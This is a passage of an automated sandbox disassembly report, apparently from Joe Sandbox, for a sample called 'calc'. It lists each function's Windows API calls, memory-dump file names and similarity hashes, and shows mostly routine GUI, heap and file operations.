RtlExitUserThread.NTDLL(?), ref: 0044AFEE
FlsGetValue.KERNEL32(0045B130,0000000C), ref: 0044B007
FlsSetValue.KERNEL32(?), ref: 0044B01D
GetCurrentThreadId.KERNEL32 ref: 0044B02F

Part of subcall function 00449C88: __lock.LIBCMT ref: 00449CA6
Part of subcall function 00449C88: RtlFreeHeap.NTDLL(00000000,?,0045B078,0000000C,0044C6BF,00000000,0045B3A0,00000008,0044C6F4,?,?,?,00449A5F,00000004,0045B068,0000000C), ref: 00449CED

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ThreadValue$CurrentExitFreeHeapUser__lock
String ID:
API String ID: 1595110423-0
Opcode ID: a15feaa7408c12260bb888934bb9bf853dd8b96719448381591088b266ca6c92
Instruction ID: 87a9b2721909ca5a519c4814913f14622166ecacfafa37e2c11cce841412ba36
Opcode Fuzzy Hash: a15feaa7408c12260bb888934bb9bf853dd8b96719448381591088b266ca6c92
Instruction Fuzzy Hash: 4611B431500B01EFEB24AF61DC0AA6B3BA4FF04755B10042EF8469B3A1DB78EC40CB99

Function 0040CDD9 Relevance: 6.1, APIs: 4, Instructions: 61COMMON

Download Yara Rule

APIs

MoveToEx.GDI32(?,00000000,?,00000000), ref: 0040CE13
PolyBezierTo.GDI32(?,?,00000003), ref: 0040CE21
LineTo.GDI32(?,?,?), ref: 0040CE36
LineTo.GDI32(?,00000000,?), ref: 0040CE4C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Line$BezierMovePoly
String ID:
API String ID: 2412604778-0
Opcode ID: 3884a1eee071de7890d14302d953e48a0e6caa7ee1c97a3991222ef44e30cf1f
Instruction ID: f4a798f19040babd5ae9a90d66299cb9f4b040f5f053a2fa754622e3e99d764a
Opcode Fuzzy Hash: 3884a1eee071de7890d14302d953e48a0e6caa7ee1c97a3991222ef44e30cf1f
Instruction Fuzzy Hash: 5011A031500208FFDB219F68CC88B9B7BA5FF45750F10462AFC9AA2291C3359D92DAD8

Function 0041237D Relevance: 6.1, APIs: 4, Instructions: 58filethreadCOMMON

Download Yara Rule

APIs

GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004123AC
OpenProcess.KERNEL32(00000438,00000000,00000000,?,00000800,?,004029FA,00000800,?,?,00000406,00000000,00000000), ref: 004123BB
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,00000000,?,00000000,?,00000800,?,004029FA,00000800,?,?,00000406,00000000,00000000), ref: 004123EA
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,00000800,?,004029FA,00000800,?,?,00000406,00000000,00000000), ref: 00412401

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: FileProcess$CreateMappingOpenThreadViewWindow
String ID:
API String ID: 2085894357-0
Opcode ID: 75382669b767f4ad5488222fbf913262a6e70212d0470052150fcffc01197b35
Instruction ID: 669107df82a005897c57ec4c642622ccca2b8a359d94b7e5d07929d7754caf8e
Opcode Fuzzy Hash: 75382669b767f4ad5488222fbf913262a6e70212d0470052150fcffc01197b35
Instruction Fuzzy Hash: 6111A3B6100309FFEB105F61CC44ABB776CEB88395F00462AF692C5091C274DD908B24

Function 0044E459 Relevance: 6.1, APIs: 4, Instructions: 57memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(00000000,00000050,00000000,0044EA4A), ref: 0044E480
RtlAllocateHeap.NTDLL(00000008,000041C4,00000000), ref: 0044E4B9
VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,004013F3), ref: 0044E4D7
HeapFree.KERNEL32(00000000,?,?,004013F3), ref: 0044E4EE

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Heap$Allocate$AllocFreeVirtual
String ID:
API String ID: 94566200-0
Opcode ID: a3fd5e3a949f7a78fcf4328b251d6220a18b3bd1147b161bd61c9f06b23a6b68
Instruction ID: 794246fb6d91a483d3371ec652401cc3041d5f0488e56fd6261ea09eaf57b0e3
Opcode Fuzzy Hash: a3fd5e3a949f7a78fcf4328b251d6220a18b3bd1147b161bd61c9f06b23a6b68
Instruction Fuzzy Hash: F2115B31610701AFD7B08FAAEC4592A7BB5FB85769B104E2EF162C65B0D370A849CB08

Function 00414971 Relevance: 6.1, APIs: 4, Instructions: 51synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00414991
MessageBoxW.USER32(?,?,?,?), ref: 004149C3
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 004149D8
CloseHandle.KERNEL32(00000000), ref: 004149DF

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 9bcb5aa3c768942edd719b5082d50a1b5a7429418ff23bc50409b4238d47a26f
Instruction ID: 37f3567695b4e2a04e44fe97a9f8cb04737ee47792f011c909d28ba87a63e80b
Opcode Fuzzy Hash: 9bcb5aa3c768942edd719b5082d50a1b5a7429418ff23bc50409b4238d47a26f
Instruction Fuzzy Hash: 91016872904244BFDB019FB89C848DF7FACBB89321F440276F515D3291DB348E8487A8

Function 0040418F Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004041A5
ScreenToClient.USER32(?,?), ref: 004041C3
ScreenToClient.USER32(?,?), ref: 004041E3
InvalidateRect.USER32(?,?,?,?,?,?,?), ref: 004041FA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: e6c53d79c336a4540c849928479b5bbe4b45c7717b9f6299b7b93d6f2ff35d60
Instruction ID: 7a2881a9e657539b123658c6875673d14ae470e9a9d0cf3515e33dff372f4954
Opcode Fuzzy Hash: e6c53d79c336a4540c849928479b5bbe4b45c7717b9f6299b7b93d6f2ff35d60
Instruction Fuzzy Hash: 2A111FBAD0020DEFDB51DFA8D9819DEBBF9FB48240F104166E945E3211E731AA54DB50

Function 00457312 Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

___addl.LIBCMT ref: 00457321
___addl.LIBCMT ref: 00457335
___addl.LIBCMT ref: 0045734D
___addl.LIBCMT ref: 00457365

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ___addl
String ID:
API String ID: 2260456530-0
Opcode ID: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
Instruction ID: 56a7e8b0768f1760fac7a0eab5900b619266d7ac4d86417b63611c217eca51e8
Opcode Fuzzy Hash: a6d3fea94caffdbfbeec600a8d228e4f9831f0a4e76ee5ff08ec74ce47c2ef23
Instruction Fuzzy Hash: FCF06D76404602AFDA105A42EC02E67B7E9FF44315F4444BAFD5892132F722E86CDF51

Function 0040CBA4 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 0040CCF8: DeleteObject.GDI32(?), ref: 0040CD3D
Part of subcall function 0040CCF8: ExtCreatePen.GDI32(?,?,?,00000000,00000000,?,?), ref: 0040CD84
Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CD94
Part of subcall function 0040CCF8: BeginPath.GDI32(?), ref: 0040CDAE
Part of subcall function 0040CCF8: SelectObject.GDI32(?,00000000), ref: 0040CDCD

MoveToEx.GDI32(?,?,?,00000000), ref: 0040CBC9
LineTo.GDI32(?,?,?), ref: 0040CBD6
EndPath.GDI32(?), ref: 0040CBE8
StrokePath.GDI32(?), ref: 0040CBF2

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ObjectPath$Select$BeginCreateDeleteLineMoveStroke
String ID:
API String ID: 2783949968-0
Opcode ID: 47ea1dba58f7e82b7ac036a59097fcfdc4d59cfee1255a3750341a2d29e0b913
Instruction ID: 7addbb669f48b3f8bb91b73a7c195707b1c7606dfb2b93494881525acfad2860
Opcode Fuzzy Hash: 47ea1dba58f7e82b7ac036a59097fcfdc4d59cfee1255a3750341a2d29e0b913
Instruction Fuzzy Hash: 0EF0E931100209FBDF221F649C49FEE3FB45B46B12F044529FE14B12D2CB798851E7A9

Function 004030FC Relevance: 6.0, APIs: 4, Instructions: 27threadwindowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(0045C6D0,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00403119
GetWindowThreadProcessId.USER32(0045C6D0,00000000), ref: 0040312E
GetCurrentThreadId.KERNEL32 ref: 00403135
AttachThreadInput.USER32(00000000,?,0040301A,?,00000001), ref: 0040313C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
String ID:
API String ID: 2710830443-0
Opcode ID: f061325f79de26fa8bd7ada1c3a173e6ada7418d19c7524b275892b6c77a0e0a
Instruction ID: e0469f5d39f6c9a8ed97173fcd7a9f0b0481b7a02a8b853d1df90955247d746e
Opcode Fuzzy Hash: f061325f79de26fa8bd7ada1c3a173e6ada7418d19c7524b275892b6c77a0e0a
Instruction Fuzzy Hash: 59E01231684308FAEB119F60DC0AF9A3F5CAB14B42F508021B705AD0E2D7B9DAA1CB5C

Function 0040DE09 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 214comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(0000000C,00000001), ref: 0040DF8B

Part of subcall function 0040E034: OleSetContainedObject.OLE32(75C08500,00000000), ref: 0040E0A3
Part of subcall function 0040E034: IsWindow.USER32(0011FEE8), ref: 0040E0FC

Strings

Container, xrefs: 0040DF37
AutoIt3GUI, xrefs: 0040DF2B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ContainedObject$Window
String ID: AutoIt3GUI$Container
API String ID: 2752853911-3941886329
Opcode ID: 8e6ee2c316e27129d9d6d28a79f25b567a849c9034daffe22e7cad4a73fbc4f5
Instruction ID: bf47823b7056066a5e2e6accf56a3fe746e3b4a49be001c8bdeeda6f12d14935
Opcode Fuzzy Hash: 8e6ee2c316e27129d9d6d28a79f25b567a849c9034daffe22e7cad4a73fbc4f5
Instruction Fuzzy Hash: 62818AB0A00602EFCB14DFA5C8C496ABBB4FF48305B20856EE906DB791C779E855CF94

Function 00454120 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 135COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 0045415C

Strings

0H, xrefs: 00454282
0H, xrefs: 0045422B

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: Info
String ID: 0H$0H
API String ID: 1807457897-3632109438
Opcode ID: a03b05c39c204be3cfdac47b8496c9b10152d593e6408a9f2bbe70603d1d90d3
Instruction ID: 857a1bb90ed6b757db5288b16b7c828b2284c8cc85c9d493c8eebaa07cc69fb3
Opcode Fuzzy Hash: a03b05c39c204be3cfdac47b8496c9b10152d593e6408a9f2bbe70603d1d90d3
Instruction Fuzzy Hash: E34149709141605EE740EF64D88427E7BE0AB8934AF2844BFF9558F353C23A49CE8B9D

Function 00412C29 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000000), ref: 00412C6D
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00412DBE

Strings

Line: , xrefs: 00412CE1

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: IconLoadNotifyShell_String
String ID: Line:
API String ID: 3363329723-1585850449
Opcode ID: ac6f7842dab233d1e68704d78533ec32c694b5aa436cd5726a7fbaefa039d289
Instruction ID: d44aa6c7ff2ceec8a5e2fc5b0b8ec97f83009bbda05c0c700851c1c9c39894c2
Opcode Fuzzy Hash: ac6f7842dab233d1e68704d78533ec32c694b5aa436cd5726a7fbaefa039d289
Instruction Fuzzy Hash: E241A4B19042089AEB11DF65DC45BDE7BB8BB44318F00016BF509E3291E7B89AD9CB9D

Function 0045705F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 109fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0044F7F5: SetFilePointer.KERNEL32(00000000,00000000,00000000,?,?,?,0044F8C0,?,00000000,0044EFF8,0045B9B8,0000000C,0044CCA9,?,00000000,00000002), ref: 0044F822
Part of subcall function 0044F7F5: GetLastError.KERNEL32 ref: 0044F82F

SetEndOfFile.KERNEL32(00000000,?,?,?,00000000,?,?,?,00455E63,00000000,80000000), ref: 0045714F
GetLastError.KERNEL32(?,?,?,00000000,?,?,?,00455E63,00000000,80000000), ref: 00457174

Strings

c^E, xrefs: 004570B0, 00457138, 004570EA

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: ErrorFileLast$Pointer
String ID: c^E
API String ID: 1697706070-2539547054
Opcode ID: cfd755cca87d619af5feba0446fd4f4da26253de6824d47dc33922f992f189b7
Instruction ID: b36608169c62242103fee92faa6a2b2a4f55438ee637c16eb5b786c1d23c8d19
Opcode Fuzzy Hash: cfd755cca87d619af5feba0446fd4f4da26253de6824d47dc33922f992f189b7
Instruction Fuzzy Hash: B9314C71900514ABEF212F65DC45B8E3B64EF08355F10417BFD089B292EA798E488B9C

Function 0040B435 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000469,?,00000000), ref: 0040B4E8
SendMessageW.USER32(?,00000465,00000000,80017FFF), ref: 0040B4F8

Strings

msctls_updown32, xrefs: 0040B469

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: msctls_updown32
API String ID: 3850602802-2298589950
Opcode ID: 6379d174e26c128a804c38e3f495b71b257c212925a7d6601335cd6feca22ee9
Instruction ID: 3d460db20afce04995f9f54f52d8810648ed05b4425190c924ea1cb92289fdf7
Opcode Fuzzy Hash: 6379d174e26c128a804c38e3f495b71b257c212925a7d6601335cd6feca22ee9
Instruction Fuzzy Hash: 46318FB1600209BFDB00CF24DC81DAB37A9EF59358B10406AF901A73D1DB34ED52DBA8

Function 0040BACF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 90windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 0040BBAB
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0040BBC3

Strings

', xrefs: 0040BB1F

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: d2497bf30880c0e0f6f9250b73f4ff933048766acc535da351d0025d50bfa92f
Instruction ID: 790da75ecd06bc5f8f21dc72d14b365d84c45d9b578440653fd79ec7c8b9c65c
Opcode Fuzzy Hash: d2497bf30880c0e0f6f9250b73f4ff933048766acc535da351d0025d50bfa92f
Instruction Fuzzy Hash: BA3109B19003099FCB10CF99C880ADEB7F5FF58310F55446AEA49EB795D374A981CB98

Function 00454E4A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__shift.LIBCMT ref: 00454E6D

Part of subcall function 00454E2D: _strlen.LIBCMT ref: 00454E35

_strcat.LIBCMT ref: 00454EAA

Strings

e+000, xrefs: 00454E9C

Memory Dump Source

Source File: 00000000.00000002.1237945520.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1237928287.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000465000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000482000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1237945520.0000000000486000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1238083300.0000000000489000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_calc.jbxd

Similarity

API ID: __shift_strcat_strlen
String ID: e+000
API String ID: 208078240-1027065040
Opcode ID: c1451e237096401f43faf898fed7d531d20f8d40ded23736f31a8e9cbef58cc2
Instruction ID: c17b212e9c6a6195a33cd92223d512c1f4d604f34dd2aa8fe3ac825eb24e3e10
Opcode Fuzzy Hash: c1451e237096401f43faf898fed7d531d20f8d40ded23736f31a8e9cbef58cc2
